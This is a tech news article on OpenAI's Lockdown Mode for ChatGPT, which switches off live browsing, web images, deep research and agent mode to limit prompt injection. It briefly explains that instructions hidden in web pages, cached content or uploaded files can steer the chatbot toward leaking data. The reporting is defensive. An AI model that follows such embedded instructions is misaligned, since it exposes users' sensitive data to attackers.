OpenAI unveils Lockdown Mode to protect sensitive data from prompt injection attacks
OpenAI has introduced "Lockdown Mode" to enhance protection against prompt injection attacks, which subtly embed malicious instructions in web content. This feature restricts advanced functionalities like live web browsing and deep research, aiming to safeguard sensitive data for high-risk users. The company acknowledges that even with Lockdown Mode, some vulnerabilities may persist, primarily in cached content or uploaded files.
OpenAI has launched "Lockdown Mode," a new feature designed to counter prompt injection attacks. These attacks involve embedding malicious instructions within web pages and other digital content sources, potentially compromising chatbot interactions. The new mode restricts several advanced functionalities within ChatGPT to mitigate these risks.
Specifically, Lockdown Mode disables live web browsing, limiting access to only cached content. It also prevents the retrieval and display of images from the web, though image generation remains possible. Additionally, deep research capabilities and the agent mode are deactivated to further reduce exposure to malicious prompts.
OpenAI notes that while Lockdown Mode significantly enhances security, it doesn't eliminate all prompt injection vulnerabilities. Attacks could still originate from cached web content or uploaded files, potentially influencing the chatbot's behavior or accuracy. The primary goal is to minimize the chances of sensitive data being inadvertently shared or compromised during interactions.
Lockdown Mode is not intended for all users. It is specifically designed for individuals and organizations that handle highly sensitive data and require stringent protection against data exfiltration risks associated with prompt injection. The feature aims to provide an additional layer of security for these high-stakes environments.
Currently, OpenAI is rolling out Lockdown Mode to self-serve ChatGPT Business accounts and eligible personal accounts. This phased deployment ensures that users with the greatest need for enhanced security can access these protections first, reinforcing data integrity for critical operations.
Related articles
Build real agentic apps using CUGA: two dozen working examples on a lightweight harness
CUGA, IBM's open-source Agent Harness, simplifies building agentic applications by handling infrastructure, allowing developers to focus on tools and prompts. It offers pre-assembled components for planning, execution, and state management, significantly reducing development time. CUGA has topped agent benchmarks like AppWorld and WebArena.
OpenAI launches new initiative to help find and patch open source bugs
OpenAI has launched "Patch the Planet," a new initiative in partnership with cybersecurity firm Trail of Bits, to enhance the security of open-source projects. This program aims to assist maintainers in identifying and patching bugs, utilizing OpenAI's AI-powered security tools while reducing the burden on project teams.
PP-OCRv6 on Hugging Face: 50-Language OCR from 1.5M to 34.5M Parameters
Baidu has released PP-OCRv6, an advanced optical character recognition (OCR) model supporting 50 languages. Available on Hugging Face, this version significantly improves accuracy and efficiency across various parameter sizes, from 1.5 million to 34.5 million, marking a substantial leap in multilingual OCR technology.